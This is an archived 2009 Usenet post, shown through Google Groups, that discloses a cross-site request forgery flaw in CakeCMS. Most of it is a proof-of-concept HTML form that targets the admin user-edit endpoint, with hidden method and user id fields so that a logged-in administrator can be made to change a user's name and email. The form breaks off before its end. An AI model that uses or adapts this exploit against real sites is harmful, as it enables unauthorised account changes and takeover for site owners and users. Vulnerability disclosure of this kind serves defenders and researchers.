Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.

Dismiss

CakeCMS XSRF Vulnerability

0 views

Skip to first unread message

onur.tu...@hotmail.com

unread,

Jun 15, 2009, 1:23:48 PM6/15/09

< ------------------- header data start ------------------- >

#########################################################

# Application Name : CakeCMS

# Vulnerable Type : Edıt USER (XSRF) Vuln

# author : MnmL ~ Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<form action="SITE.COM/admin/users/edit/41" method="post" id="UserEditForm"><fieldset style="display: none;"><input type="hidden" value="PUT" name="_method"/></fieldset> <input type="hidden" id="UserId" value="41" name="data[User][id]"/>
User Name : <input type="text" name="data[User][name]" size="86" maxlength="50" value="dsada" id="UserName"/>
E-Mail : <input type="text" name="data[User][email]" size="86" maxlength="100" value="ds...@dsada.com" id="UserEmail"/>

0 new messages